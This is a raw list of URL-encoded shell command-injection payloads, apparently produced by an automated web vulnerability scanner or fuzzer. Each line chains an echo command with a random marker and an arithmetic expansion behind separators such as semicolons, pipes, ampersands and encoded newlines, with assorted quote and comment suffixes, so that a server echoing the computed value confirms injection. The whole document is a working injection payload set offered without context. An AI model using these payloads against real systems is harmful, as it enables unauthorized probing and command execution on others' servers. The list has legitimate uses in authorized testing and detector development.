+%20echo%20BSYIFX$((64%2B71))$(echo%20BSYIFX)BSYIFX// +;echo%20FRDAGY$((96%2B63))$(echo%20FRDAGY)FRDAGY// +&echo%20QLUITC$((73%2B99))$(echo%20QLUITC)QLUITC// +|echo%20SBZVBA$((97%2B74))$(echo%20SBZVBA)SBZVBA// +||echo%20ZZJQZV$((83%2B59))$(echo%20ZZJQZV)ZZJQZV// +&&echo%20RIWFAA$((64%2B99))$(echo%20RIWFAA)RIWFAA// +%0aecho%20MESJOF$((62%2B27))$(echo%20MESJOF)MESJOF// +%3Becho%20SVKHMK$((30%2B19))$(echo%20SVKHMK)SVKHMK// +%26echo%20ZPAVCI$((24%2B53))$(echo%20ZPAVCI)ZPAVCI// +%26%26echo%20MXMWUR$((62%2B86))$(echo%20MXMWUR)MXMWUR// +%7Cecho%20AGUYET$((89%2B40))$(echo%20AGUYET)AGUYET// +%7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU// +echo%20ZUXLTJ$((16%2B69))$(echo%20ZUXLTJ)ZUXLTJ\ +%20echo%20QQZCOQ$((29%2B94))$(echo%20QQZCOQ)QQZCOQ\ +;echo%20KHCYPO$((77%2B38))$(echo%20KHCYPO)KHCYPO\ +&echo%20MCEEEZ$((59%2B2))$(echo%20MCEEEZ)MCEEEZ\ +|echo%20OYDZIJ$((96%2B61))$(echo%20OYDZIJ)OYDZIJ\ +||echo%20PJBTDO$((60%2B74))$(echo%20PJBTDO)PJBTDO\ +&&echo%20HETHMD$((47%2B99))$(echo%20HETHMD)HETHMD\ +%0aecho%20HNNUGD$((25%2B95))$(echo%20HNNUGD)HNNUGD\ +%3Becho%20OFIKGO$((60%2B50))$(echo%20OFIKGO)OFIKGO\ +%26echo%20RKCZIL$((79%2B92))$(echo%20RKCZIL)RKCZIL\ +%26%26echo%20WLJUON$((15%2B95))$(echo%20WLJUON)WLJUON\ +%7Cecho%20WEBPND$((27%2B55))$(echo%20WEBPND)WEBPND\ +%7C%7Cecho%20HKTMWP$((40%2B9))$(echo%20HKTMWP)HKTMWP\ +echo%20MTEZNM$((22%2B3))$(echo%20MTEZNM)MTEZNM& +%20echo%20YPQTYX$((9%2B27))$(echo%20YPQTYX)YPQTYX& +;echo%20UNXFGJ$((26%2B60))$(echo%20UNXFGJ)UNXFGJ& +&echo%20KUCRVN$((73%2B39))$(echo%20KUCRVN)KUCRVN& +|echo%20FNYPPK$((77%2B83))$(echo%20FNYPPK)FNYPPK& +||echo%20NRVZFD$((41%2B1))$(echo%20NRVZFD)NRVZFD& +&&echo%20QAGWEJ$((84%2B54))$(echo%20QAGWEJ)QAGWEJ& +%0aecho%20HNTZSH$((50%2B30))$(echo%20HNTZSH)HNTZSH& +%3Becho%20HGVPJY$((28%2B49))$(echo%20HGVPJY)HGVPJY& +%26echo%20FWAUTF$((39%2B22))$(echo%20FWAUTF)FWAUTF& +%26%26echo%20BSQKBM$((74%2B49))$(echo%20BSQKBM)BSQKBM& +%7Cecho%20SEIDBX$((80%2B51))$(echo%20SEIDBX)SEIDBX& +%7C%7Cecho%20TVKSTF$((99%2B96))$(echo%20TVKSTF)TVKSTF& +echo%20XOEUCM$((23%2B30))$(echo%20XOEUCM)XOEUCM| +%20echo%20DRFYNB$((7%2B97))$(echo%20DRFYNB)DRFYNB| +;echo%20SIRYMP$((7%2B6))$(echo%20SIRYMP)SIRYMP| +&echo%20SPRAWO$((58%2B5))$(echo%20SPRAWO)SPRAWO| +|echo%20OTDJOE$((4%2B21))$(echo%20OTDJOE)OTDJOE| +||echo%20RFRIIL$((68%2B10))$(echo%20RFRIIL)RFRIIL| +&&echo%20GKEMGA$((51%2B90))$(echo%20GKEMGA)GKEMGA| +%0aecho%20ZNOLCP$((67%2B83))$(echo%20ZNOLCP)ZNOLCP| +%3Becho%20PSHEAA$((43%2B12))$(echo%20PSHEAA)PSHEAA| +%26echo%20YPFSZA$((90%2B71))$(echo%20YPFSZA)YPFSZA| +%26%26echo%20BHDDGG$((67%2B94))$(echo%20BHDDGG)BHDDGG| +%7Cecho%20UFFOUX$((59%2B47))$(echo%20UFFOUX)UFFOUX| +%7C%7Cecho%20CXXXGW$((34%2B53))$(echo%20CXXXGW)CXXXGW| +echo%20URJEMH$((2%2B45))$(echo%20URJEMH)URJEMH%27 +%20echo%20ALRHIH$((11%2B27))$(echo%20ALRHIH)ALRHIH%27 +;echo%20IPTSZG$((46%2B17))$(echo%20IPTSZG)IPTSZG%27 +&echo%20YHCAGI$((22%2B26))$(echo%20YHCAGI)YHCAGI%27 +|echo%20DZPIWA$((18%2B47))$(echo%20DZPIWA)DZPIWA%27 +||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27 +&&echo%20QZXLOK$((2%2B27))$(echo%20QZXLOK)QZXLOK%27 +%0aecho%20URBCMK$((17%2B54))$(echo%20URBCMK)URBCMK%27 +%3Becho%20QHDGWH$((99%2B66))$(echo%20QHDGWH)QHDGWH%27 +%26echo%20WOTYOT$((32%2B39))$(echo%20WOTYOT)WOTYOT%27 +%26%26echo%20CSSQPT$((9%2B40))$(echo%20CSSQPT)CSSQPT%27 +%7Cecho%20CPQTYB$((64%2B20))$(echo%20CPQTYB)CPQTYB%27 +%7C%7Cecho%20EBGHXU$((74%2B4))$(echo%20EBGHXU)EBGHXU%27 +echo%20LENNLE$((14%2B89))$(echo%20LENNLE)LENNLE%22 +%20echo%20FPVLKT$((63%2B87))$(echo%20FPVLKT)FPVLKT%22 +;echo%20OIHFAC$((90%2B34))$(echo%20OIHFAC)OIHFAC%22 +&echo%20QLFUON$((35%2B62))$(echo%20QLFUON)QLFUON%22 +|echo%20GEPPDW$((55%2B58))$(echo%20GEPPDW)GEPPDW%22 +||echo%20DETQCQ$((28%2B83))$(echo%20DETQCQ)DETQCQ%22 +&&echo%20BALAGY$((97%2B95))$(echo%20BALAGY)BALAGY%22 +%0aecho%20PETUUK$((81%2B85))$(echo%20PETUUK)PETUUK%22 +%3Becho%20LBKHXK$((90%2B74))$(echo%20LBKHXK)LBKHXK%22 +%26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22 +%26%26echo%20DNDLZD$((92%2B6))$(echo%20DNDLZD)DNDLZD%22 +%7Cecho%20ORHNZL$((45%2B63))$(echo%20ORHNZL)ORHNZL%22 +%7C%7Cecho%20TEDJVC$((96%2B45))$(echo%20TEDJVC)TEDJVC%22 +echo%20AQRKLL$((20%2B31))$(echo%20AQRKLL)AQRKLL%5C%5C +%20echo%20CKFAYE$((18%2B45))$(echo%20CKFAYE)CKFAYE%5C%5C +;echo%20HYBMMW$((16%2B36))$(echo%20HYBMMW)HYBMMW%5C%5C +&echo%20NOKSUR$((8%2B35))$(echo%20NOKSUR)NOKSUR%5C%5C +|echo%20OTDXSU$((6%2B1))$(echo%20OTDXSU)OTDXSU%5C%5C +||echo%20KFLFGL$((10%2B4))$(echo%20KFLFGL)KFLFGL%5C%5C +&&echo%20MKGYYL$((46%2B31))$(echo%20MKGYYL)MKGYYL%5C%5C +%0aecho%20ANSTBN$((20%2B35))$(echo%20ANSTBN)ANSTBN%5C%5C +%3Becho%20OHYLGW$((56%2B18))$(echo%20OHYLGW)OHYLGW%5C%5C +%26echo%20NFGINK$((64%2B92))$(echo%20NFGINK)NFGINK%5C%5C +%26%26echo%20EJACRB$((30%2B66))$(echo%20EJACRB)EJACRB%5C%5C +%7Cecho%20QNJYVT$((4%2B44))$(echo%20QNJYVT)QNJYVT%5C%5C +%7C%7Cecho%20UBHYQD$((55%2B41))$(echo%20UBHYQD)UBHYQD%5C%5C +echo%20TJAXUJ$((80%2B70))$(echo%20TJAXUJ)TJAXUJ%2F%2F +%20echo%20RGMCLI$((27%2B75))$(echo%20RGMCLI)RGMCLI%2F%2F +;echo%20KUXGTM$((7%2B89))$(echo%20KUXGTM)KUXGTM%2F%2F +&echo%20CCYVIF$((50%2B63))$(echo%20CCYVIF)CCYVIF%2F%2F +|echo%20GRWCHE$((81%2B54))$(echo%20GRWCHE)GRWCHE%2F%2F +||echo%20OZJGZU$((76%2B56))$(echo%20OZJGZU)OZJGZU%2F%2F +&&echo%20RLCXAD$((4%2B93))$(echo%20RLCXAD)RLCXAD%2F%2F +%0aecho%20KYMBVZ$((7%2B62))$(echo%20KYMBVZ)KYMBVZ%2F%2F +%3Becho%20SVFHGU$((48%2B4))$(echo%20SVFHGU)SVFHGU%2F%2F +%26echo%20OXZPGU$((40%2B61))$(echo%20OXZPGU)OXZPGU%2F%2F +%26%26echo%20PUUCTR$((68%2B33))$(echo%20PUUCTR)PUUCTR%2F%2F +%7Cecho%20CGYJPN$((45%2B35))$(echo%20CGYJPN)CGYJPN%2F%2F +%7C%7Cecho%20XVNYDY$((93%2B18))$(echo%20XVNYDY)XVNYDY%2F%2F +echo%20ZZAYTQ$((30%2B82))$(echo%20ZZAYTQ)ZZAYTQ%26 +%20echo%20TWTKKJ$((67%2B81))$(echo%20TWTKKJ)TWTKKJ%26 +;echo%20DDXENF$((29%2B82))$(echo%20DDXENF)DDXENF%26 +&echo%20JFDHZU$((1%2B12))$(echo%20JFDHZU)JFDHZU%26 +|echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26 +||echo%20IHELYG$((76%2B62))$(echo%20IHELYG)IHELYG%26 +&&echo%20LOAKXY$((52%2B22))$(echo%20LOAKXY)LOAKXY%26 +%0aecho%20JXLHHG$((94%2B73))$(echo%20JXLHHG)JXLHHG%26 +%3Becho%20FAHQNN$((39%2B84))$(echo%20FAHQNN)FAHQNN%26 +%26echo%20RDICIX$((99%2B44))$(echo%20RDICIX)RDICIX%26 +%26%26echo%20ZTWRSM$((30%2B32))$(echo%20ZTWRSM)ZTWRSM%26 +%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26 +%7C%7Cecho%20OYGMVZ$((16%2B56))$(echo%20OYGMVZ)OYGMVZ%26 +echo%20LZWGVJ$((6%2B60))$(echo%20LZWGVJ)LZWGVJ%7C +%20echo%20YEOGLL$((28%2B5))$(echo%20YEOGLL)YEOGLL%7C +;echo%20MXKHVK$((46%2B71))$(echo%20MXKHVK)MXKHVK%7C +&echo%20OSJJGL$((20%2B68))$(echo%20OSJJGL)OSJJGL%7C +|echo%20FZLTEJ$((27%2B72))$(echo%20FZLTEJ)FZLTEJ%7C +||echo%20ZLPJPQ$((81%2B32))$(echo%20ZLPJPQ)ZLPJPQ%7C +&&echo%20KXTSXC$((16%2B52))$(echo%20KXTSXC)KXTSXC%7C +%0aecho%20QUHONN$((15%2B27))$(echo%20QUHONN)QUHONN%7C +%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C +%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C +%26%26echo%20FFQWQY$((35%2B58))$(echo%20FFQWQY)FFQWQY%7C +%7Cecho%20DPZHUT$((28%2B81))$(echo%20DPZHUT)DPZHUT%7C +%7C%7Cecho%20FFBSEF$((15%2B13))$(echo%20FFBSEF)FFBSEF%7C +'echo%20OKVFZD$((59%2B78))$(echo%20OKVFZD)OKVFZD +'%20echo%20KSLOZF$((6%2B29))$(echo%20KSLOZF)KSLOZF +';echo%20PWKXHB$((27%2B16))$(echo%20PWKXHB)PWKXHB +'&echo%20EBREVB$((48%2B67))$(echo%20EBREVB)EBREVB +'|echo%20TRMWWT$((44%2B53))$(echo%20TRMWWT)TRMWWT +'||echo%20JQACJR$((33%2B35))$(echo%20JQACJR)JQACJR +'&&echo%20ZJEXPP$((7%2B99))$(echo%20ZJEXPP)ZJEXPP +'%0aecho%20ICLECP$((72%2B88))$(echo%20ICLECP)ICLECP +'%3Becho%20VUJCMW$((70%2B75))$(echo%20VUJCMW)VUJCMW +'%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ +'%26%26echo%20ATQDYD$((66%2B7))$(echo%20ATQDYD)ATQDYD +'%7Cecho%20LPCJMS$((42%2B26))$(echo%20LPCJMS)LPCJMS +'%7C%7Cecho%20PROWNM$((55%2B15))$(echo%20PROWNM)PROWNM +'echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY' +'%20echo%20CFTYMJ$((83%2B12))$(echo%20CFTYMJ)CFTYMJ' +';echo%20NUCRTG$((61%2B63))$(echo%20NUCRTG)NUCRTG' +'&echo%20COKQPG$((93%2B87))$(echo%20COKQPG)COKQPG' +'|echo%20VQUOCA$((12%2B35))$(echo%20VQUOCA)VQUOCA' +'||echo%20QPBCIU$((74%2B42))$(echo%20QPBCIU)QPBCIU' +'&&echo%20TWQKFP$((48%2B69))$(echo%20TWQKFP)TWQKFP' +'%0aecho%20BTIFJC$((66%2B80))$(echo%20BTIFJC)BTIFJC' +'%3Becho%20URYBVY$((71%2B95))$(echo%20URYBVY)URYBVY' +'%26echo%20SDBGBI$((27%2B20))$(echo%20SDBGBI)SDBGBI' +'%26%26echo%20CMXOJB$((29%2B98))$(echo%20CMXOJB)CMXOJB' +'%7Cecho%20CFOPSJ$((27%2B97))$(echo%20CFOPSJ)CFOPSJ' +'%7C%7Cecho%20YHTZHZ$((60%2B82))$(echo%20YHTZHZ)YHTZHZ' +'echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG" +'%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG" +';echo%20PYWYEX$((88%2B85))$(echo%20PYWYEX)PYWYEX" +'&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH" +'|echo%20CKJBUZ$((1%2B22))$(echo%20CKJBUZ)CKJBUZ" +'||echo%20GPBEGV$((20%2B34))$(echo%20GPBEGV)GPBEGV" +'&&echo%20BSQSGI$((11%2B44))$(echo%20BSQSGI)BSQSGI" +'%0aecho%20SZLYQY$((17%2B3))$(echo%20SZLYQY)SZLYQY" +'%3Becho%20MAQCNL$((34%2B31))$(echo%20MAQCNL)MAQCNL" +'%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK" +'%26%26echo%20YBQKFD$((48%2B31))$(echo%20YBQKFD)YBQKFD" +'%7Cecho%20UJMTRL$((89%2B70))$(echo%20UJMTRL)UJMTRL" +'%7C%7Cecho%20QSKTXK$((24%2B37))$(echo%20QSKTXK)QSKTXK" +'echo%20KOOMPK$((13%2B41))$(echo%20KOOMPK)KOOMPK +'%20echo%20MJNNEW$((18%2B53))$(echo%20MJNNEW)MJNNEW +';echo%20HTPOKC$((39%2B32))$(echo%20HTPOKC)HTPOKC +'&echo%20CLYXGN$((72%2B81))$(echo%20CLYXGN)CLYXGN +'|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN +'||echo%20TOWNYH$((45%2B79))$(echo%20TOWNYH)TOWNYH +'&&echo%20KYOISY$((63%2B3))$(echo%20KYOISY)KYOISY +'%0aecho%20EIOCXK$((27%2B80))$(echo%20EIOCXK)EIOCXK +'%3Becho%20LMKOMS$((85%2B51))$(echo%20LMKOMS)LMKOMS +'%26echo%20XIZQEH$((78%2B28))$(echo%20XIZQEH)XIZQEH +'%26%26echo%20AKFLIE$((27%2B64))$(echo%20AKFLIE)AKFLIE +'%7Cecho%20TOTSLG$((60%2B1))$(echo%20TOTSLG)TOTSLG +'%7C%7Cecho%20DVAMSG$((74%2B5))$(echo%20DVAMSG)DVAMSG +'echo%20GGRVQX$((86%2B56))$(echo%20GGRVQX)GGRVQX// +'%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ// +';echo%20YDSNXZ$((29%2B43))$(echo%20YDSNXZ)YDSNXZ// +'&echo%20BRXZKX$((10%2B84))$(echo%20BRXZKX)BRXZKX// +'|echo%20ZMCCDQ$((18%2B56))$(echo%20ZMCCDQ)ZMCCDQ// +'||echo%20XNZLSA$((34%2B75))$(echo%20XNZLSA)XNZLSA// +'&&echo%20SKRKXO$((18%2B5))$(echo%20SKRKXO)SKRKXO// +'%0aecho%20WIRUWF$((87%2B88))$(echo%20WIRUWF)WIRUWF// +'%3Becho%20LIHHVF$((18%2B45))$(echo%20LIHHVF)LIHHVF// +'%26echo%20VDQUYJ$((41%2B46))$(echo%20VDQUYJ)VDQUYJ// +'%26%26echo%20EKWZHX$((96%2B4))$(echo%20EKWZHX)EKWZHX// +'%7Cecho%20LLJKNH$((3%2B88))$(echo%20LLJKNH)LLJKNH// +'%7C%7Cecho%20CNSLVN$((6%2B10))$(echo%20CNSLVN)CNSLVN// +'echo%20UVXCGD$((51%2B43))$(echo%20UVXCGD)UVXCGD\ +'%20echo%20BYBKHF$((87%2B41))$(echo%20BYBKHF)BYBKHF\ +';echo%20ACEKKI$((66%2B70))$(echo%20ACEKKI)ACEKKI\ +'&echo%20WHEUEX$((35%2B4))$(echo%20WHEUEX)WHEUEX\ +'|echo%20LTTDYL$((1%2B42))$(echo%20LTTDYL)LTTDYL\ +'||echo%20VAYJRW$((6%2B1))$(echo%20VAYJRW)VAYJRW\ +'&&echo%20WZZOUT$((83%2B36))$(echo%20WZZOUT)WZZOUT\ +'%0aecho%20BMHVJK$((19%2B30))$(echo%20BMHVJK)BMHVJK\ +'%3Becho%20HQBNCX$((10%2B83))$(echo%20HQBNCX)HQBNCX\ +'%26echo%20BRROSL$((24%2B11))$(echo%20BRROSL)BRROSL\ +'%26%26echo%20IKUKJX$((80%2B89))$(echo%20IKUKJX)IKUKJX\ +'%7Cecho%20KAJAPA$((75%2B48))$(echo%20KAJAPA)KAJAPA\ +'%7C%7Cecho%20JJSSJL$((99%2B38))$(echo%20JJSSJL)JJSSJL\ +'echo%20QQEHPP$((69%2B2))$(echo%20QQEHPP)QQEHPP& +'%20echo%20JFTFZW$((33%2B39))$(echo%20JFTFZW)JFTFZW& +';echo%20PYZNPF$((23%2B64))$(echo%20PYZNPF)PYZNPF& +'&echo%20XYOEXK$((74%2B11))$(echo%20XYOEXK)XYOEXK& +'|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI& +'||echo%20GERZZX$((98%2B84))$(echo%20GERZZX)GERZZX& +'&&echo%20HVTWDK$((44%2B47))$(echo%20HVTWDK)HVTWDK& +'%0aecho%20MGXPRT$((51%2B4))$(echo%20MGXPRT)MGXPRT& +'%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ& +'%26echo%20JUIBAU$((1%2B74))$(echo%20JUIBAU)JUIBAU& +'%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ& +'%7Cecho%20ZPVFOX$((81%2B22))$(echo%20ZPVFOX)ZPVFOX& +'%7C%7Cecho%20SLVMKV$((96%2B0))$(echo%20SLVMKV)SLVMKV& +'echo%20HBTLLE$((1%2B32))$(echo%20HBTLLE)HBTLLE| +'%20echo%20HNOLCQ$((85%2B27))$(echo%20HNOLCQ)HNOLCQ| +';echo%20CCXTNP$((57%2B74))$(echo%20CCXTNP)CCXTNP| +'&echo%20ELYXQO$((59%2B10))$(echo%20ELYXQO)ELYXQO| +'|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT| +'||echo%20LAPJJF$((87%2B11))$(echo%20LAPJJF)LAPJJF| +'&&echo%20TWKYHE$((0%2B57))$(echo%20TWKYHE)TWKYHE| +'%0aecho%20MAOXEM$((48%2B53))$(echo%20MAOXEM)MAOXEM| +'%3Becho%20QGKSLY$((79%2B94))$(echo%20QGKSLY)QGKSLY| +'%26echo%20UCANNA$((30%2B68))$(echo%20UCANNA)UCANNA| +'%26%26echo%20ZWVYHU$((11%2B21))$(echo%20ZWVYHU)ZWVYHU| +'%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL| +'%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY| +'echo%20ZKEZHZ$((79%2B67))$(echo%20ZKEZHZ)ZKEZHZ%27 +'%20echo%20DCFSTX$((93%2B73))$(echo%20DCFSTX)DCFSTX%27 +';echo%20HPSGQK$((19%2B98))$(echo%20HPSGQK)HPSGQK%27 +'&echo%20LTTPNV$((10%2B90))$(echo%20LTTPNV)LTTPNV%27 +'|echo%20RAKMKS$((5%2B89))$(echo%20RAKMKS)RAKMKS%27 +'||echo%20SGXVWY$((48%2B78))$(echo%20SGXVWY)SGXVWY%27 +'&&echo%20XOCEJG$((66%2B21))$(echo%20XOCEJG)XOCEJG%27 +'%0aecho%20PPSKOS$((66%2B51))$(echo%20PPSKOS)PPSKOS%27 +'%3Becho%20HKYEGB$((78%2B19))$(echo%20HKYEGB)HKYEGB%27 +'%26echo%20YRIYND$((40%2B81))$(echo%20YRIYND)YRIYND%27 +'%26%26echo%20SWZBKK$((94%2B84))$(echo%20SWZBKK)SWZBKK%27 +'%7Cecho%20KIELDL$((12%2B2))$(echo%20KIELDL)KIELDL%27 +'%7C%7Cecho%20AXSULH$((48%2B60))$(echo%20AXSULH)AXSULH%27 +'echo%20WIBNDS$((23%2B85))$(echo%20WIBNDS)WIBNDS%22 +'%20echo%20HBUFGZ$((85%2B26))$(echo%20HBUFGZ)HBUFGZ%22 +';echo%20RHFTCS$((28%2B7))$(echo%20RHFTCS)RHFTCS%22 +'&echo%20RJCCAT$((53%2B34))$(echo%20RJCCAT)RJCCAT%22 +'|echo%20UTCPPJ$((1%2B15))$(echo%20UTCPPJ)UTCPPJ%22 +'||echo%20DNOHYC$((47%2B59))$(echo%20DNOHYC)DNOHYC%22 +'&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22 +'%0aecho%20GGGPWE$((90%2B87))$(echo%20GGGPWE)GGGPWE%22 +'%3Becho%20WIJQLD$((58%2B39))$(echo%20WIJQLD)WIJQLD%22 +'%26echo%20PXNVTZ$((92%2B1))$(echo%20PXNVTZ)PXNVTZ%22 +'%26%26echo%20DDHYJG$((44%2B11))$(echo%20DDHYJG)DDHYJG%22 +'%7Cecho%20WUSBMH$((6%2B46))$(echo%20WUSBMH)WUSBMH%22 +'%7C%7Cecho%20ZJAXER$((49%2B60))$(echo%20ZJAXER)ZJAXER%22 +'echo%20GZXGVN$((4%2B70))$(echo%20GZXGVN)GZXGVN%5C%5C +'%20echo%20UXKTUC$((59%2B25))$(echo%20UXKTUC)UXKTUC%5C%5C +';echo%20KKGOUA$((23%2B96))$(echo%20KKGOUA)KKGOUA%5C%5C +'&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C +'|echo%20LRGWPW$((14%2B39))$(echo%20LRGWPW)LRGWPW%5C%5C +'||echo%20ANRNDB$((81%2B57))$(echo%20ANRNDB)ANRNDB%5C%5C +'&&echo%20XWGNWJ$((33%2B16))$(echo%20XWGNWJ)XWGNWJ%5C%5C +'%0aecho%20IMHMUF$((78%2B85))$(echo%20IMHMUF)IMHMUF%5C%5C +'%3Becho%20JPRQKB$((93%2B89))$(echo%20JPRQKB)JPRQKB%5C%5C +'%26echo%20NKMKNI$((64%2B82))$(echo%20NKMKNI)NKMKNI%5C%5C +'%26%26echo%20PMWJRH$((60%2B59))$(echo%20PMWJRH)PMWJRH%5C%5C +'%7Cecho%20RHSIRJ$((85%2B6))$(echo%20RHSIRJ)RHSIRJ%5C%5C +'%7C%7Cecho%20NEBEJR$((3%2B38))$(echo%20NEBEJR)NEBEJR%5C%5C +'echo%20OLRHZX$((22%2B72))$(echo%20OLRHZX)OLRHZX%2F%2F +'%20echo%20PPRCPS$((95%2B69))$(echo%20PPRCPS)PPRCPS%2F%2F +';echo%20ICITTS$((63%2B83))$(echo%20ICITTS)ICITTS%2F%2F +'&echo%20FXSADU$((58%2B85))$(echo%20FXSADU)FXSADU%2F%2F +'|echo%20NINPLO$((85%2B22))$(echo%20NINPLO)NINPLO%2F%2F +'||echo%20UAPCZM$((19%2B50))$(echo%20UAPCZM)UAPCZM%2F%2F +'&&echo%20JGTGES$((48%2B34))$(echo%20JGTGES)JGTGES%2F%2F +'%0aecho%20QVUNCP$((53%2B11))$(echo%20QVUNCP)QVUNCP%2F%2F +'%3Becho%20GHQCJV$((24%2B65))$(echo%20GHQCJV)GHQCJV%2F%2F +'%26echo%20ZXUJMM$((66%2B53))$(echo%20ZXUJMM)ZXUJMM%2F%2F +'%26%26echo%20UWWBJC$((28%2B91))$(echo%20UWWBJC)UWWBJC%2F%2F +'%7Cecho%20ZGANEQ$((95%2B91))$(echo%20ZGANEQ)ZGANEQ%2F%2F +'%7C%7Cecho%20WVNPRW$((44%2B23))$(echo%20WVNPRW)WVNPRW%2F%2F +'echo%20ZQODFO$((38%2B30))$(echo%20ZQODFO)ZQODFO%26 +'%20echo%20VBRTZG$((57%2B99))$(echo%20VBRTZG)VBRTZG%26 +';echo%20EDEYQK$((45%2B89))$(echo%20EDEYQK)EDEYQK%26 +'&echo%20HUEWVL$((15%2B9))$(echo%20HUEWVL)HUEWVL%26 +'|echo%20FWJJDN$((64%2B27))$(echo%20FWJJDN)FWJJDN%26 +'||echo%20DJIUPG$((86%2B80))$(echo%20DJIUPG)DJIUPG%26 +'&&echo%20LQMLDZ$((74%2B43))$(echo%20LQMLDZ)LQMLDZ%26 +'%0aecho%20VECHDM$((44%2B40))$(echo%20VECHDM)VECHDM%26 +'%3Becho%20ZPQVVV$((58%2B25))$(echo%20ZPQVVV)ZPQVVV%26 +'%26echo%20IECZZA$((76%2B1))$(echo%20IECZZA)IECZZA%26 +'%26%26echo%20WRWTAS$((61%2B67))$(echo%20WRWTAS)WRWTAS%26 +'%7Cecho%20VBTZIY$((45%2B53))$(echo%20VBTZIY)VBTZIY%26 +'%7C%7Cecho%20QOWWZU$((31%2B94))$(echo%20QOWWZU)QOWWZU%26 +'echo%20NIXAXB$((47%2B23))$(echo%20NIXAXB)NIXAXB%7C +'%20echo%20MIVIHV$((7%2B58))$(echo%20MIVIHV)MIVIHV%7C +';echo%20CYLOAT$((50%2B30))$(echo%20CYLOAT)CYLOAT%7C +'&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C +'|echo%20DTSQRM$((82%2B33))$(echo%20DTSQRM)DTSQRM%7C +'||echo%20SPFQXR$((54%2B70))$(echo%20SPFQXR)SPFQXR%7C +'&&echo%20TQZUUM$((43%2B5))$(echo%20TQZUUM)TQZUUM%7C +'%0aecho%20LRJXVV$((74%2B11))$(echo%20LRJXVV)LRJXVV%7C +'%3Becho%20QGYQUP$((35%2B73))$(echo%20QGYQUP)QGYQUP%7C +'%26echo%20SYNXTK$((0%2B99))$(echo%20SYNXTK)SYNXTK%7C +'%26%26echo%20MIQKPQ$((80%2B18))$(echo%20MIQKPQ)MIQKPQ%7C +'%7Cecho%20HKFPKH$((65%2B16))$(echo%20HKFPKH)HKFPKH%7C +'%7C%7Cecho%20FUFIPG$((27%2B62))$(echo%20FUFIPG)FUFIPG%7C +"echo%20UFAGYK$((82%2B39))$(echo%20UFAGYK)UFAGYK +"%20echo%20IXTSZA$((19%2B14))$(echo%20IXTSZA)IXTSZA +";echo%20BJMUOS$((51%2B32))$(echo%20BJMUOS)BJMUOS +"&echo%20CYVXHL$((2%2B25))$(echo%20CYVXHL)CYVXHL +"|echo%20JFFFCK$((98%2B39))$(echo%20JFFFCK)JFFFCK +"||echo%20JZKWAX$((82%2B62))$(echo%20JZKWAX)JZKWAX +"&&echo%20PFNZYT$((53%2B30))$(echo%20PFNZYT)PFNZYT +"%0aecho%20CJDAVC$((37%2B56))$(echo%20CJDAVC)CJDAVC +"%3Becho%20XKMIXJ$((55%2B55))$(echo%20XKMIXJ)XKMIXJ +"%26echo%20XPABSL$((91%2B48))$(echo%20XPABSL)XPABSL +"%26%26echo%20MSODXX$((98%2B77))$(echo%20MSODXX)MSODXX +"%7Cecho%20NIUSSD$((14%2B80))$(echo%20NIUSSD)NIUSSD +"%7C%7Cecho%20ZXHQBT$((34%2B29))$(echo%20ZXHQBT)ZXHQBT +"echo%20LROQVJ$((59%2B51))$(echo%20LROQVJ)LROQVJ' +"%20echo%20AWPUDF$((45%2B83))$(echo%20AWPUDF)AWPUDF' +";echo%20DHCQNM$((60%2B94))$(echo%20DHCQNM)DHCQNM' +"&echo%20AMSBLU$((47%2B94))$(echo%20AMSBLU)AMSBLU' +"|echo%20DKGJRP$((17%2B97))$(echo%20DKGJRP)DKGJRP' +"||echo%20TABSEM$((52%2B6))$(echo%20TABSEM)TABSEM' +"&&echo%20YPKEUZ$((26%2B62))$(echo%20YPKEUZ)YPKEUZ' +"%0aecho%20UIFJEM$((39%2B5))$(echo%20UIFJEM)UIFJEM' +"%3Becho%20RBDSUF$((59%2B65))$(echo%20RBDSUF)RBDSUF' +"%26echo%20HKWALZ$((5%2B31))$(echo%20HKWALZ)HKWALZ' +"%26%26echo%20XHYRUC$((45%2B24))$(echo%20XHYRUC)XHYRUC' +"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR' +"%7C%7Cecho%20BOMIAP$((85%2B40))$(echo%20BOMIAP)BOMIAP' +"echo%20UEUAGM$((11%2B22))$(echo%20UEUAGM)UEUAGM" +"%20echo%20IWYYYV$((59%2B47))$(echo%20IWYYYV)IWYYYV" +";echo%20NUURLG$((10%2B93))$(echo%20NUURLG)NUURLG" +"&echo%20DTXNAY$((11%2B40))$(echo%20DTXNAY)DTXNAY" +"|echo%20UPRLNQ$((23%2B4))$(echo%20UPRLNQ)UPRLNQ" +"||echo%20VKPFAP$((92%2B94))$(echo%20VKPFAP)VKPFAP" +"&&echo%20KWPRCS$((3%2B21))$(echo%20KWPRCS)KWPRCS" +"%0aecho%20MJVQYB$((44%2B28))$(echo%20MJVQYB)MJVQYB" +"%3Becho%20TMWMCT$((51%2B35))$(echo%20TMWMCT)TMWMCT" 